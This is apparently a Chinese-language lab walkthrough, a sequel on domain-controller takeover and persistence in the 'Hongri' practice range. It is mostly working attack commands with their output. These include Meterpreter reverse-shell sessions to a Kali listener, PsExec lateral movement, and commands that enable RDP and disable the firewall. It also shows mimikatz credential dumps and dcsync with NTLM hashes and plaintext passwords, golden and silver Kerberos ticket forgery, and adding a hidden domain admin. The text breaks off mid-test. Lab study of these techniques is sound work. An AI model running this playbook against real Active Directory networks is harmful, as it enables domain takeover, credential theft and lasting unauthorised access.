红日靶场(一)续篇_权限维持
- 前情提要
- 当前位置
- 执行目标
- PsExec.exe拿下域控2008
- rdesktop 远程登录win7
- msf上传文件
- kail回连马连上win7
- upload上传PsExec.exe
- PsExec.exe把win7 带到 2008(域控hostname:owa)
- 2008开远程、关防火墙
- Win7使用远程桌面登录2008
- 将猕猴桃上传到Win7、2008
- 黄金票据(方法一)
- 信息搜集【域控DC执行】
- 伪造票据【域内其他主机】
- 清空缓存票据【域内其他主机】
- 导入并查看票据【域内其他主机】
- 添加用户(域内.管理员权限)与查看【域内其他主机】
- 测试: 新用户使用PsExex控制域控
- 白银票据(方法二)
- 1. 本机管理员的权限(执行前)
- 2. DC 域控信息收集
- 3. 伪造白银票据(执行后)
- 黄金票据(方法二)
- 1. 信息收集(域内管理员权限)
- 上传猕猴桃
- 获取krbtgt的哈希
- 获取SID
- 2. 伪造票据
- 3. 利用黄金票据
- 4. 测试:使用PsExex控制域控
- 1. 创建会话
- 2. 上传猕猴桃、PsExec.exe工具
- 3. 信息搜集【域内管理员权限】
- 4.伪造黄金票据与测试【本地管理员权限】
- 5. hack01使用PsExec控制域控
- 参考
- 挖个坑
前情提要
本实验是红日靶场(一)的后续,靶场环境搭建,外网渗透进内网的部分这里将不再赘述。
【内网攻防实战】红日靶场01 👉 https://blog.csdn.net/weixin_46022776/article/details/139295589
当前位置
执行目标
现在的情况是:
- 我们已经用攻击机Kail拿下处于边界的Win7
- 也拿到GOD\Administrator 的shell
- 使用msf提权到系统,kiwi抓取kbs,知道了密码为2024@hongri
目标:我需要拿下域控,并进行权限维持
PsExec.exe拿下域控2008
rdesktop 远程登录win7
┌──(root㉿kali)-[~]
└─# rdesktop 192.168.72.131
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
msf上传文件
kail回连马连上win7
msf调用模块multi/handler开启监听,rdesktop里的win7进入到C盘下,点击之前上传的64.exe回连马。
msf6 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 0.0.0.0:5555
[*] Sending stage (200774 bytes) to 192.168.72.131
[*] Meterpreter session 4 opened (192.168.72.200:5555 -> 192.168.72.131:18363) at 2024-06-08 16:26:03 +0800upload上传PsExec.exe
msf开启监听连上win7后,upload 上传 PsExec.exe,我这里 的PsExec.exe是放在/root目录下的
meterpreter > lcd /root
meterpreter > upload PsExec.exe
[*] Uploading : /root/PsExec.exe -> PsExec.exe
[*] Uploaded 815.37 KiB of 815.37 KiB (100.0%): /root/PsExec.exe -> PsExec.exe
[*] Completed : /root/PsExec.exe -> PsExec.exe
meterpreter > 
PsExec.exe把win7 带到 2008(域控hostname:owa)
PsExec.exe \\god.org cmd
这里能看到主机名发生了变化,stu1变成了owa
2008开远程、关防火墙
其实现在我们就相当于拿到了2008的shell了,让server 2008开启远程并关掉防火墙,这样后面win7就能用远程桌面登录进2008
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh firewall set opmode disable
Win7使用远程桌面登录2008
Win内开启远程桌面,输入密码2024@hongri
Win7 成功登进2008,域控DC拿下,接下来是权限维持。
将猕猴桃上传到Win7、2008
msf6 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 0.0.0.0:5555
(略。。。)meterpreter > lcd /root/Desktop
meterpreter > upload x64.zip
[*] Uploading : /root/Desktop/x64.zip -> x64.zip
[*] Uploaded 628.89 KiB of 628.89 KiB (100.0%): /root/Desktop/x64.zip -> x64.zip
[*] Completed : /root/Desktop/x64.zip -> x64.zip
meterpreter > shell
Process 4496 created.
Channel 2 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:\>chcp 65001
chcp 65001
Active code page: 65001C:\>copy x64.zip \\192.168.52.138\c$
copy x64.zip \\192.168.52.138\c$1 file(s) copied.C:\>kail上传upload猕猴桃x64.zip到Win7,Win 7 再复制copy一份到2008的C目录下
解压,进入x64目录下,2008和Win7 都启动猕猴桃
黄金票据(方法一)
在制作黄金票据时,需要以下条件:
- 域内管理员的权限(首先是拥有域内权限,且这个身份还必须是域的管理员)
- 拿到域控DC的shell(可以不在域控的机子上执行,但cmd的hostname必须是域控的主机名owa)
信息搜集【域控DC执行】
mimikatz.exe
privilege::debug
lsadump::dcsync /domain:god.org /all /csv
exit
whoami /all
可以在远程登录的界面执行
也可以在Win7之前被PsExex.exe带入域控的god.org:cmd上执行,效果是一样的
这两个执行方法的shell的hostname都是owa,这就是前面说的,一必须拿到域内管理员的权限,二必须拿到域控DC的shell,你可以远程登录域控的机子执行cmd,也可以使用PsExec.exe把shell从stu1带到owa(DC主机)。
伪造票据【域内其他主机】
【注意】上面sid的
-500不要写进去
mimikatz.exe
Kerberos::golden /user:administrator /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:558ae7f88589153355cbeb046ac696df /ticket:golden.kiribi
清空缓存票据【域内其他主机】
kerberos::purge
导入并查看票据【域内其他主机】
kerberos::ptt golden.kiribi
kerberos::tgt
添加用户(域内.管理员权限)与查看【域内其他主机】
net user testkbs Kerberos@2024 /add /domain
net group "domain admins" testkbs /add /domain
计算机 – 右键 – 管理 – 角色 – AD域服务 – AD用户和计算机 – god.org – User
测试: 新用户使用PsExex控制域控
kail开启一个新的终端,远程连接win7,这里使用新用户GOD\testkbs登录
┌──(root㉿kali)-[~]
└─# rdesktop 192.168.72.131
白银票据(方法二)
1. 本机管理员的权限(执行前)
net user /domain
dir \\owa\C$
PsExec.exe \\god.org cmd
2. DC 域控信息收集
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >log.txt
打开log.txt
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ## > https://blog.gentilkiwi.com/mimikatz'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )'#####' > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(commandline) # privilege::debug
Privilege '20' OKmimikatz(commandline) # sekurlsa::logonpasswordsAuthentication Id : 0 ; 7822526 (00000000:00775cbe)
Session : RemoteInteractive from 2
User Name : Administrator
Domain : GOD
Logon Server : OWA
Logon Time : 2024/6/8 16:57:17
SID : S-1-5-21-2952760202-1353902439-2381784089-500msv : [00000003] Primary* Username : Administrator* Domain : GOD* LM : eb9afcbd6f6c4cacffae40634accf0e8* NTLM : db4371323f83b0ad7f16ea72eb1fcd73* SHA1 : c57e17a5823e543faae1d3ff66d171290ae69dfetspkg : * Username : Administrator* Domain : GOD* Password : 2024@hongriwdigest : * Username : Administrator* Domain : GOD* Password : 2024@hongrikerberos : * Username : Administrator* Domain : GOD.ORG* Password : 2024@hongrissp : credman : Authentication Id : 0 ; 3730688 (00000000:0038ed00)
Session : Interactive from 1
User Name : liukaifeng01
Domain : GOD
Logon Server : OWA
Logon Time : 2024/6/1 8:30:40
SID : S-1-5-21-2952760202-1353902439-2381784089-1000msv : [00000003] Primary* Username : liukaifeng01* Domain : GOD* LM : 504f1ff24983db0037bf477e3ed39fca* NTLM : 4a549006cbb3489f8ed040e2771a5a14* SHA1 : 152e317193b61cfb90ff32297297d9801c6d6874tspkg : * Username : liukaifeng01* Domain : GOD* Password : hongri@2024wdigest : * Username : liukaifeng01* Domain : GOD* Password : hongri@2024kerberos : * Username : liukaifeng01* Domain : GOD.ORG* Password : hongri@2024ssp : credman : Authentication Id : 0 ; 3730652 (00000000:0038ecdc)
Session : Interactive from 1
User Name : liukaifeng01
Domain : GOD
Logon Server : OWA
Logon Time : 2024/6/1 8:30:40
SID : S-1-5-21-2952760202-1353902439-2381784089-1000msv : [00000003] Primary* Username : liukaifeng01* Domain : GOD* LM : 504f1ff24983db0037bf477e3ed39fca* NTLM : 4a549006cbb3489f8ed040e2771a5a14* SHA1 : 152e317193b61cfb90ff32297297d9801c6d6874tspkg : * Username : liukaifeng01* Domain : GOD* Password : hongri@2024wdigest : * Username : liukaifeng01* Domain : GOD* Password : hongri@2024kerberos : * Username : liukaifeng01* Domain : GOD.ORG* Password : hongri@2024ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : OWA$
Domain : GOD
Logon Server : (null)
Logon Time : 2024/5/31 10:38:10
SID : S-1-5-20msv : [00000003] Primary* Username : OWA$* Domain : GOD* NTLM : 19e4410dee5e1007bd435430491222b9* SHA1 : e48aed977c31b645c94d4238c44e937bae77f408tspkg : wdigest : * Username : OWA$* Domain : GOD* Password : 06 0e 11 5d d4 08 7c 00 98 1f a9 9c d9 ae fe 65 f1 ff ab e5 bf 20 bd 38 87 3f 30 a0 dc 9d ef 82 eb e3 af 67 64 ab a8 74 69 23 40 5e 2a 02 60 b4 c6 9f 92 71 f7 fe 2c e0 eb f4 6c 69 ea bd ca 13 c4 90 07 96 52 6d 58 0a 6e 6c bc ce f7 54 e4 a2 a5 97 14 14 75 c8 05 70 db d9 6d ea 53 0b c9 c0 27 cf ce 4e d9 4f 37 20 2a 42 7c 2f 63 23 42 ea a5 61 43 24 87 fa 90 9c 59 95 69 6b 94 1d c3 ac bb ca dc a9 f2 82 e4 0b 4b 05 77 e8 ca 47 2c cc ea 00 42 e5 3f 2f 0a 51 03 72 f9 50 cf 29 5f cd 7d 38 de 07 e7 7c 91 8f 42 e7 d9 3f b7 bf b0 24 0f 91 69 46 32 55 49 48 a7 9c 86 57 17 29 0d 7f c4 c8 f1 7b f6 4f 10 84 4f cc 2e 5d 05 30 d0 d8 ba 30 40 31 a4 73 f6 6b ae d9 01 c3 05 58 f7 ff 78 90 0f 95 95 85 21 d5 df ed c3 4d 5a fd 21 0b kerberos : * Username : owa$* Domain : GOD.ORG* Password : 06 0e 11 5d d4 08 7c 00 98 1f a9 9c d9 ae fe 65 f1 ff ab e5 bf 20 bd 38 87 3f 30 a0 dc 9d ef 82 eb e3 af 67 64 ab a8 74 69 23 40 5e 2a 02 60 b4 c6 9f 92 71 f7 fe 2c e0 eb f4 6c 69 ea bd ca 13 c4 90 07 96 52 6d 58 0a 6e 6c bc ce f7 54 e4 a2 a5 97 14 14 75 c8 05 70 db d9 6d ea 53 0b c9 c0 27 cf ce 4e d9 4f 37 20 2a 42 7c 2f 63 23 42 ea a5 61 43 24 87 fa 90 9c 59 95 69 6b 94 1d c3 ac bb ca dc a9 f2 82 e4 0b 4b 05 77 e8 ca 47 2c cc ea 00 42 e5 3f 2f 0a 51 03 72 f9 50 cf 29 5f cd 7d 38 de 07 e7 7c 91 8f 42 e7 d9 3f b7 bf b0 24 0f 91 69 46 32 55 49 48 a7 9c 86 57 17 29 0d 7f c4 c8 f1 7b f6 4f 10 84 4f cc 2e 5d 05 30 d0 d8 ba 30 40 31 a4 73 f6 6b ae d9 01 c3 05 58 f7 ff 78 90 0f 95 95 85 21 d5 df ed c3 4d 5a fd 21 0b ssp : credman : Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/5/31 10:38:45
SID : S-1-5-17msv : tspkg : wdigest : * Username : (null)* Domain : (null)* Password : (null)kerberos : ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/5/31 10:38:10
SID : S-1-5-19msv : tspkg : wdigest : * Username : (null)* Domain : (null)* Password : (null)kerberos : * Username : (null)* Domain : (null)* Password : (null)ssp : credman : Authentication Id : 0 ; 45603 (00000000:0000b223)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2024/5/31 10:38:09
SID : msv : [00000003] Primary* Username : OWA$* Domain : GOD* NTLM : 19e4410dee5e1007bd435430491222b9* SHA1 : e48aed977c31b645c94d4238c44e937bae77f408tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : OWA$
Domain : GOD
Logon Server : (null)
Logon Time : 2024/5/31 10:38:09
SID : S-1-5-18msv : tspkg : wdigest : * Username : OWA$* Domain : GOD* Password : 06 0e 11 5d d4 08 7c 00 98 1f a9 9c d9 ae fe 65 f1 ff ab e5 bf 20 bd 38 87 3f 30 a0 dc 9d ef 82 eb e3 af 67 64 ab a8 74 69 23 40 5e 2a 02 60 b4 c6 9f 92 71 f7 fe 2c e0 eb f4 6c 69 ea bd ca 13 c4 90 07 96 52 6d 58 0a 6e 6c bc ce f7 54 e4 a2 a5 97 14 14 75 c8 05 70 db d9 6d ea 53 0b c9 c0 27 cf ce 4e d9 4f 37 20 2a 42 7c 2f 63 23 42 ea a5 61 43 24 87 fa 90 9c 59 95 69 6b 94 1d c3 ac bb ca dc a9 f2 82 e4 0b 4b 05 77 e8 ca 47 2c cc ea 00 42 e5 3f 2f 0a 51 03 72 f9 50 cf 29 5f cd 7d 38 de 07 e7 7c 91 8f 42 e7 d9 3f b7 bf b0 24 0f 91 69 46 32 55 49 48 a7 9c 86 57 17 29 0d 7f c4 c8 f1 7b f6 4f 10 84 4f cc 2e 5d 05 30 d0 d8 ba 30 40 31 a4 73 f6 6b ae d9 01 c3 05 58 f7 ff 78 90 0f 95 95 85 21 d5 df ed c3 4d 5a fd 21 0b kerberos : * Username : owa$* Domain : GOD.ORG* Password : 06 0e 11 5d d4 08 7c 00 98 1f a9 9c d9 ae fe 65 f1 ff ab e5 bf 20 bd 38 87 3f 30 a0 dc 9d ef 82 eb e3 af 67 64 ab a8 74 69 23 40 5e 2a 02 60 b4 c6 9f 92 71 f7 fe 2c e0 eb f4 6c 69 ea bd ca 13 c4 90 07 96 52 6d 58 0a 6e 6c bc ce f7 54 e4 a2 a5 97 14 14 75 c8 05 70 db d9 6d ea 53 0b c9 c0 27 cf ce 4e d9 4f 37 20 2a 42 7c 2f 63 23 42 ea a5 61 43 24 87 fa 90 9c 59 95 69 6b 94 1d c3 ac bb ca dc a9 f2 82 e4 0b 4b 05 77 e8 ca 47 2c cc ea 00 42 e5 3f 2f 0a 51 03 72 f9 50 cf 29 5f cd 7d 38 de 07 e7 7c 91 8f 42 e7 d9 3f b7 bf b0 24 0f 91 69 46 32 55 49 48 a7 9c 86 57 17 29 0d 7f c4 c8 f1 7b f6 4f 10 84 4f cc 2e 5d 05 30 d0 d8 ba 30 40 31 a4 73 f6 6b ae d9 01 c3 05 58 f7 ff 78 90 0f 95 95 85 21 d5 df ed c3 4d 5a fd 21 0b ssp : credman : mimikatz(commandline) # exit
Bye!3. 伪造白银票据(执行后)
rc4 一定要找跟域控主机名对应的hash
举个例子:域控主机名OWA
- 先找域控主机名=> * Username : OWA$
- 再找hash => * NTLM : 19e4410dee5e1007bd435430491222b9
所以,rc4:19e4410dee5e1007bd435430491222b9
target:域控主机名.域名
- 域控主机名 => owa
- 域名 => god.org
所以,target:owa.god.org
## 清空之前的票据
klist purge
## 开启猕猴桃
mimikatz.exe
## 白银票据:伪造共享文件夹服务(cifs)权限
kerberos::golden /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /target:owa.god.org /service:cifs /rc4:19e4410dee5e1007bd435430491222b9 /user:hack01 /ptt
## 退出
exit
## 查看权限
dir \\owa\C$
黄金票据(方法二)
1. 信息收集(域内管理员权限)
上传猕猴桃
msf6 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 0.0.0.0:5555
[*] Sending stage (200774 bytes) to 192.168.72.131
[*] Meterpreter session 4 opened (192.168.72.200:5555 -> 192.168.72.131:18389) at 2024-06-09 22:50:41 +0800meterpreter > lcd /root/Desktop
meterpreter > upload x64.zip
[*] Uploading : /root/Desktop/x64.zip -> x64.zip
[*] Uploaded 628.89 KiB of 628.89 KiB (100.0%): /root/Desktop/x64.zip -> x64.zip
[*] Completed : /root/Desktop/x64.zip -> x64.zip获取krbtgt的哈希
meterpreter > shell
Process 3496 created.
Channel 2 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:\>chcp 65001
chcp 65001
Active code page: 65001C:\>cd C:\x64
cd C:\x64C:\x64>whoami
whoami
god\administratorC:\x64>mimikatz.exe
mimikatz.exe.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ## > https://blog.gentilkiwi.com/mimikatz'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )'#####' > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz # privilege::debug
Privilege '20' OKmimikatz # lsadump::dcsync /domain:god.org /all /csv
[DC] 'god.org' will be the domain
[DC] 'owa.god.org' will be the DC server
[DC] Exporting domain 'god.org'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt 58e91a5ac358d86513ab224312314061 514
1106 ligang 1e3d22f88dfd250c9312d21686c60f41 512
1107 DEV1$ bed18e5b9d13bb384a3041a10d43c01b 4128
1104 ROOT-TVI862UBEH$ d67367ecf4bb9c01d2043539d11c75dd 4096
1000 liukaifeng01 4a549006cbb3489f8ed040e2771a5a14 544
500 Administrator db4371323f83b0ad7f16ea72eb1fcd73 512
1001 OWA$ 19e4410dee5e1007bd435430491222b9 532480
1105 STU1$ 889a6931bb99725d146c68fa1b90dd44 4128mimikatz # exit
Bye!也可以一句话搞定,然后hack01打开tgtlog.txt查看
C:\x64>mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:god.org /all /csv" "exit">tgtlog.txt
获取SID
C:\x64>whoami /all
whoami /allUSER INFORMATION
----------------User Name SID
================= =============================================
god\administrator S-1-5-21-2952760202-1353902439-2381784089-500GROUP INFORMATION
-----------------Group Name Type SID Attributes
========================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
控制台登录 Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
GOD\Domain Admins Group S-1-5-21-2952760202-1353902439-2381784089-512 Mandatory group, Enabled by default, Enabled group
GOD\Group Policy Creator Owners Group S-1-5-21-2952760202-1353902439-2381784089-520 Mandatory group, Enabled by default, Enabled group
GOD\Enterprise Admins Group S-1-5-21-2952760202-1353902439-2381784089-519 Mandatory group, Enabled by default, Enabled group
GOD\Schema Admins Group S-1-5-21-2952760202-1353902439-2381784089-518 Mandatory group, Enabled by default, Enabled group
GOD\Denied RODC Password Replication Group Alias S-1-5-21-2952760202-1353902439-2381784089-572 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group, Local GroupPRIVILEGES INFORMATION
----------------------Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Disabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links DisabledC:\x64>exit
exit
meterpreter > getuid
Server username: GOD\Administrator
meterpreter > 2. 伪造票据
Kerberos::golden /user:hack01 /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /ticket:golden.kiribi
3. 利用黄金票据
清空缓存票据
## 清空缓存票据
kerberos::purge
## 导入票据
kerberos::ptt golden.kiribi
## 查看票据
kerberos::tgt
4. 测试:使用PsExex控制域控
测试前:无法远程连接到域控
1. 创建会话
rdesktop 192.168.72.131远程登录Win7,以hack01的身份登录,密码1324@cbD
msf 创建两个会话,一个是拥有域内管理员权限的Administrator @ STU1 ,一个是拥有本机管理员权限的hack01 @ STU1
msf6 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 0.0.0.0:5555
[*] Sending stage (200774 bytes) to 192.168.72.131
[*] Meterpreter session 4 opened (192.168.72.200:5555 -> 192.168.72.131:18166) at 2024-06-10 02:50:02 +0800meterpreter > bg
[*] Backgrounding session 4...
msf6 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 0.0.0.0:5555
[*] Sending stage (200774 bytes) to 192.168.72.131
[*] Meterpreter session 5 opened (192.168.72.200:5555 -> 192.168.72.131:18220) at 2024-06-10 02:51:59 +0800meterpreter > bg
[*] Backgrounding session 5...
msf6 exploit(multi/handler) > sessionsActive sessions
===============Id Name Type Information Connection-- ---- ---- ----------- ----------4 meterpreter x64/windows GOD\Administrator @ STU1 192.168.72.200:5555 -> 192.168.72.131:18166 (192.168.72.131)5 meterpreter x64/windows STU1\hack01 @ STU1 192.168.72.200:5555 -> 192.168.72.131:18220 (192.168.72.131)2. 上传猕猴桃、PsExec.exe工具
msf6 exploit(multi/handler) > sessions 4
[*] Starting interaction with 4...meterpreter > getuid
Server username: GOD\Administrator
meterpreter > lcd /root/Desktop
meterpreter > upload x64.zip
[*] Uploading : /root/Desktop/x64.zip -> x64.zip
[*] Uploaded 628.89 KiB of 628.89 KiB (100.0%): /root/Desktop/x64.zip -> x64.zip
[*] Completed : /root/Desktop/x64.zip -> x64.zip
meterpreter > upload PsExec.exe
[*] Uploading : /root/Desktop/PsExec.exe -> PsExec.exe
[*] Uploaded 815.37 KiB of 815.37 KiB (100.0%): /root/Desktop/PsExec.exe -> PsExec.exe
[*] Completed : /root/Desktop/PsExec.exe -> PsExec.exe
解压猕猴桃压缩包x64.zip。
3. 信息搜集【域内管理员权限】
meterpreter > shell
Process 3716 created.
Channel 3 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:\>chcp 65001
chcp 65001
Active code page: 65001C:\>cd C:\x64
cd C:\x64C:\x64>whoami
whoami
god\administratorC:\x64>mimikatz.exe
mimikatz.exe.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ## > https://blog.gentilkiwi.com/mimikatz'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )'#####' > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz # privilege::debug
Privilege '20' OKmimikatz # lsadump::dcsync /domain:god.org /all /csv
[DC] 'god.org' will be the domain
[DC] 'owa.god.org' will be the DC server
[DC] Exporting domain 'god.org'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt 58e91a5ac358d86513ab224312314061 514
1106 ligang 1e3d22f88dfd250c9312d21686c60f41 512
1107 DEV1$ bed18e5b9d13bb384a3041a10d43c01b 4128
1104 ROOT-TVI862UBEH$ d67367ecf4bb9c01d2043539d11c75dd 4096
1000 liukaifeng01 4a549006cbb3489f8ed040e2771a5a14 544
1105 STU1$ 889a6931bb99725d146c68fa1b90dd44 4128
500 Administrator db4371323f83b0ad7f16ea72eb1fcd73 512
1001 OWA$ 19e4410dee5e1007bd435430491222b9 532480mimikatz # exit
ERROR mimikatz_doLocal ; "" command of "standard" module not found !Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)exit - Quit mimikatzcls - Clear screen (doesn't work with redirections, like PsExec)answer - Answer to the Ultimate Question of Life, the Universe, and Everythingcoffee - Please, make me a coffee!sleep - Sleep an amount of millisecondslog - Log mimikatz input/output to filebase64 - Switch file input/output base64version - Display some version informationscd - Change or display current directorylocaltime - Displays system local date and time (OJ command)hostname - Displays system local hostnamemimikatz # exit
Bye!C:\x64>whoami /all
whoami /allUSER INFORMATION
----------------User Name SID
================= =============================================
god\administrator S-1-5-21-2952760202-1353902439-2381784089-500GROUP INFORMATION
-----------------Group Name Type SID Attributes
========================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
控制台登录 Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
GOD\Domain Admins Group S-1-5-21-2952760202-1353902439-2381784089-512 Mandatory group, Enabled by default, Enabled group
GOD\Group Policy Creator Owners Group S-1-5-21-2952760202-1353902439-2381784089-520 Mandatory group, Enabled by default, Enabled group
GOD\Enterprise Admins Group S-1-5-21-2952760202-1353902439-2381784089-519 Mandatory group, Enabled by default, Enabled group
GOD\Schema Admins Group S-1-5-21-2952760202-1353902439-2381784089-518 Mandatory group, Enabled by default, Enabled group
GOD\Denied RODC Password Replication Group Alias S-1-5-21-2952760202-1353902439-2381784089-572 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group, Local GroupPRIVILEGES INFORMATION
----------------------Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Disabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links DisabledC:\x64>exit
exit
meterpreter > bg
[*] Backgrounding session 4...
4.伪造黄金票据与测试【本地管理员权限】
msf6 exploit(multi/handler) > sessions 5
[*] Starting interaction with 5...meterpreter > getuid
Server username: STU1\hack01
meterpreter > shell
Process 2152 created.
Channel 6 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:\>chcp 65001
chcp 65001
Active code page: 65001C:\>cd C:\x64
cd C:\x64C:\x64>dir \\owa.god.org\c$
dir \\owa.god.org\c$
Logon failure: unknown user name or bad password.C:\x64>whoami
whoami
stu1\hack01C:\x64>mimikatz.exe
mimikatz.exe.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ## > https://blog.gentilkiwi.com/mimikatz'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )'#####' > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz # kerberos::golden /user:hack01 /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /ticket:golden.kirbi
User : hack01
Domain : god.org (GOD)
SID : S-1-5-21-2952760202-1353902439-2381784089
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 58e91a5ac358d86513ab224312314061 - rc4_hmac_nt
